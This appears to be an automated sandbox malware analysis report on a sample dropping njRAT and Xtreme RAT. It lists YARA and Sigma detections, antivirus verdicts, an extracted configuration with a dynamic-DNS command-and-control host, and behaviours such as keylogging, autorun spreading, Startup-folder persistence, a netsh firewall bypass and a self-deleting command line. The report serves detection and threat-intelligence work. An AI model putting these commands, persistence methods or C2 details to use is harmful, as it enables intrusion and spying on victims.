16.2.System.exe.d50000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
16.2.System.exe.d50000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
16.2.System.exe.d50000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
0.2.7FW4ce2RDy.exe.10000000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xbd74:$b: ServerStarted 0x89f0:$c: XtremeKeylogger 0x470c:$d: x.html 0x854a:$e: Xtreme RAT
0.2.7FW4ce2RDy.exe.10000000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x5dcd:$x1: ServerKeyloggerU 0x490b9:$x2: TServerKeylogger 0x89f0:$x3: XtremeKeylogger 0xab70:$x4: XTREMEBINDER 0x46b2e:$x4: XTREMEBINDER 0x5432e:$x4: XTREMEBINDER 0xa850:$s1: shellexecute= 0x6d4c:$s2: [Execute] 0xa796:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
0.2.7FW4ce2RDy.exe.10000000.0.unpack	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
0.2.7FW4ce2RDy.exe.10000000.0.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xab70:$b: XTREMEBINDER 0x46b2e:$b: XTREMEBINDER 0x5432e:$b: XTREMEBINDER 0x9dcc:$c: STARTSERVERBUFFER 0xcbb4:$d: SOFTWARE\XtremeRAT 0x89f0:$f: XtremeKeylogger 0x854a:$h: Xtreme RAT
1.2.svchost.exe.10000000.0.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xc974:$b: ServerStarted 0x95f0:$c: XtremeKeylogger 0x530c:$d: x.html 0x914a:$e: Xtreme RAT
1.2.svchost.exe.10000000.0.raw.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x69cd:$x1: ServerKeyloggerU 0x95f0:$x3: XtremeKeylogger 0xb770:$x4: XTREMEBINDER 0xb450:$s1: shellexecute= 0x794c:$s2: [Execute] 0xb396:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
1.2.svchost.exe.10000000.0.raw.unpack	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
1.2.svchost.exe.10000000.0.raw.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xb770:$b: XTREMEBINDER 0xa9cc:$c: STARTSERVERBUFFER 0xd7b4:$d: SOFTWARE\XtremeRAT 0x95f0:$f: XtremeKeylogger 0x914a:$h: Xtreme RAT
0.3.7FW4ce2RDy.exe.7a1784.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x41f0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x43dc:$s2: netsh firewall add allowedprogram 0x4216:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x4324:$s4: yyyy-MM-dd 0x46ec:$v2: cmd.exe /c ping 127.0.0.1 & del
0.3.7FW4ce2RDy.exe.7a1784.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.7FW4ce2RDy.exe.7a1784.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x43dc:$a1: netsh firewall add allowedprogram 0x43ac:$a2: SEE_MASK_NOZONECHECKS 0x4798:$b1: [TAP] 0x46ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x46ec:$c3: cmd.exe /c ping
19.2.System.exe.3e0000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
19.2.System.exe.3e0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
19.2.System.exe.3e0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
1.0.svchost.exe.10000000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xbd74:$b: ServerStarted 0x89f0:$c: XtremeKeylogger 0x470c:$d: x.html 0x854a:$e: Xtreme RAT
1.0.svchost.exe.10000000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x5dcd:$x1: ServerKeyloggerU 0x490b9:$x2: TServerKeylogger 0x89f0:$x3: XtremeKeylogger 0xab70:$x4: XTREMEBINDER 0x46b2e:$x4: XTREMEBINDER 0x5432e:$x4: XTREMEBINDER 0xa850:$s1: shellexecute= 0x6d4c:$s2: [Execute] 0xa796:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
1.0.svchost.exe.10000000.0.unpack	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
1.0.svchost.exe.10000000.0.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xab70:$b: XTREMEBINDER 0x46b2e:$b: XTREMEBINDER 0x5432e:$b: XTREMEBINDER 0x9dcc:$c: STARTSERVERBUFFER 0xcbb4:$d: SOFTWARE\XtremeRAT 0x89f0:$f: XtremeKeylogger 0x854a:$h: Xtreme RAT
1.2.svchost.exe.10000000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xbd74:$b: ServerStarted 0x89f0:$c: XtremeKeylogger 0x470c:$d: x.html 0x854a:$e: Xtreme RAT
1.2.svchost.exe.10000000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x5dcd:$x1: ServerKeyloggerU 0x490b9:$x2: TServerKeylogger 0x89f0:$x3: XtremeKeylogger 0xab70:$x4: XTREMEBINDER 0x46b2e:$x4: XTREMEBINDER 0x5432e:$x4: XTREMEBINDER 0xa850:$s1: shellexecute= 0x6d4c:$s2: [Execute] 0xa796:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
1.2.svchost.exe.10000000.0.unpack	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
1.2.svchost.exe.10000000.0.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xab70:$b: XTREMEBINDER 0x46b2e:$b: XTREMEBINDER 0x5432e:$b: XTREMEBINDER 0x9dcc:$c: STARTSERVERBUFFER 0xcbb4:$d: SOFTWARE\XtremeRAT 0x89f0:$f: XtremeKeylogger 0x854a:$h: Xtreme RAT
20.0.System.exe.240000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
20.0.System.exe.240000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
20.0.System.exe.240000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
4.0.562Server.exe.1d0000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
4.0.562Server.exe.1d0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
4.0.562Server.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
16.0.System.exe.d50000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
16.0.System.exe.d50000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
16.0.System.exe.d50000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
20.2.System.exe.240000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
20.2.System.exe.240000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
20.2.System.exe.240000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
4.2.562Server.exe.1d0000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
4.2.562Server.exe.1d0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
4.2.562Server.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
8.0.System.exe.3e0000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
8.0.System.exe.3e0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
8.0.System.exe.3e0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
1.0.svchost.exe.10000000.0.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xc974:$b: ServerStarted 0x95f0:$c: XtremeKeylogger 0x530c:$d: x.html 0x914a:$e: Xtreme RAT
1.0.svchost.exe.10000000.0.raw.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x69cd:$x1: ServerKeyloggerU 0x95f0:$x3: XtremeKeylogger 0xb770:$x4: XTREMEBINDER 0xb450:$s1: shellexecute= 0x794c:$s2: [Execute] 0xb396:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
1.0.svchost.exe.10000000.0.raw.unpack	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
1.0.svchost.exe.10000000.0.raw.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xb770:$b: XTREMEBINDER 0xa9cc:$c: STARTSERVERBUFFER 0xd7b4:$d: SOFTWARE\XtremeRAT 0x95f0:$f: XtremeKeylogger 0x914a:$h: Xtreme RAT
0.0.7FW4ce2RDy.exe.10000000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xbd74:$b: ServerStarted 0x89f0:$c: XtremeKeylogger 0x470c:$d: x.html 0x854a:$e: Xtreme RAT
0.0.7FW4ce2RDy.exe.10000000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x5dcd:$x1: ServerKeyloggerU 0x490b9:$x2: TServerKeylogger 0x89f0:$x3: XtremeKeylogger 0xab70:$x4: XTREMEBINDER 0x46b2e:$x4: XTREMEBINDER 0x5432e:$x4: XTREMEBINDER 0xa850:$s1: shellexecute= 0x6d4c:$s2: [Execute] 0xa796:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
0.0.7FW4ce2RDy.exe.10000000.0.unpack	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
0.0.7FW4ce2RDy.exe.10000000.0.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xab70:$b: XTREMEBINDER 0x46b2e:$b: XTREMEBINDER 0x5432e:$b: XTREMEBINDER 0x9dcc:$c: STARTSERVERBUFFER 0xcbb4:$d: SOFTWARE\XtremeRAT 0x89f0:$f: XtremeKeylogger 0x854a:$h: Xtreme RAT
Click to see the 52 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' , ParentImage: C:\Users\user\Desktop\7FW4ce2RDy.exe, ParentProcessId: 6908, ProcessCommandLine: svchost.exe, ProcessId: 3652

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' , ParentImage: C:\Users\user\Desktop\7FW4ce2RDy.exe, ParentProcessId: 6908, ProcessCommandLine: svchost.exe, ProcessId: 3652

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE, CommandLine: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\System.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\System.exe, ParentProcessId: 5712, ProcessCommandLine: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE, ProcessId: 6764

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' , ParentImage: C:\Users\user\Desktop\7FW4ce2RDy.exe, ParentProcessId: 6908, ProcessCommandLine: svchost.exe, ProcessId: 3652

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\562Server.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen

Found malware configuration

Show sources

Source: 00000000.00000002.296286620.000000000076A000.00000004.00000020.sdmp	Malware Configuration Extractor: Xtreme RAT {"id": "MuAwaY", "group": "MuAwaY", "version": "T2.9", "mutex": "HgDdsuTd", "installdir": "MuAwaYOriginal", "installdirfile": "MuAwaY.exe", "ftp server": "ftp.ftpserver.com"}
Source: 4.2.562Server.exe.1d0000.0.unpack	Malware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.6.4", "Install Name": "System.exe", "Install Dir": "TEMP", "Registry Value": "301b5fcf8ce2fab8868e80b6c1f912fe", "Host": "windownssystem.ddns.net", "Port": "1010", "Network Seprator": "\|'\|'\|"}

Multi AV Scanner detection for submitted file

Show sources

Source: 7FW4ce2RDy.exe	Virustotal: Detection: 83%			Perma Link
Source: 7FW4ce2RDy.exe	ReversingLabs: Detection: 93%

Yara detected Njrat

Show sources

Source: Yara match	File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

Antivirus / Scanner detection for submitted sample

Show sources

Source: 7FW4ce2RDy.exe

Avira: detected

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\562Server.exe	ReversingLabs: Detection: 95%

Machine Learning detection for sample

Show sources

Source: 7FW4ce2RDy.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\562Server.exe	Joe Sandbox ML: detected

Source: 4.2.562Server.exe.1d0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 1.2.svchost.exe.10000000.0.unpack	Avira: Label: TR/Agent.ssnsz
Source: 16.0.System.exe.d50000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack	Avira: Label: TR/Agent.ssnsz
Source: 20.2.System.exe.240000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 20.0.System.exe.240000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.0.System.exe.3e0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 4.0.562Server.exe.1d0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 16.2.System.exe.d50000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.2.System.exe.3e0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 19.0.System.exe.3e0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack	Avira: Label: TR/Agent.ssnsz
Source: 19.2.System.exe.3e0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 1.0.svchost.exe.10000000.0.unpack	Avira: Label: TR/Agent.ssnsz

Source: 7FW4ce2RDy.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: C:\Windows\SysWOW64\562Server.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 7FW4ce2RDy.exe	Binary or memory string: autorun.inf
Source: 7FW4ce2RDy.exe	Binary or memory string: [autorun] ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: 7FW4ce2RDy.exe	Binary or memory string: [autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: 7FW4ce2RDy.exe, 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp	Binary or memory string: [autorun]
Source: svchost.exe	Binary or memory string: autorun.inf
Source: svchost.exe	Binary or memory string: [autorun] ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: svchost.exe	Binary or memory string: [autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
Source: svchost.exe, 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp	Binary or memory string: [autorun]
Source: 7FW4ce2RDy.exe	Binary or memory string: [autorun]
Source: 7FW4ce2RDy.exe	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10005CA4 FindFirstFileW,FindClose,

0_2_10005CA4

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: windownssystem.ddns.net

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: windownssystem.ddns.net

Source: unknown

DNS traffic detected: query: windownssystem.ddns.net replaycode: Name error (3)

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_100068EC InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,

0_2_100068EC

Source: unknown

DNS traffic detected: queries for: windownssystem.ddns.net

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10005F86 URLDownloadToCacheFileW,CopyFileW,

0_2_10005F86

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: 562Server.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: System.exe.4.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 4.2.562Server.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 4.0.562Server.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 8.0.System.exe.3e0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 8.2.System.exe.3e0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 16.0.System.exe.d50000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 16.2.System.exe.d50000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 19.0.System.exe.3e0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
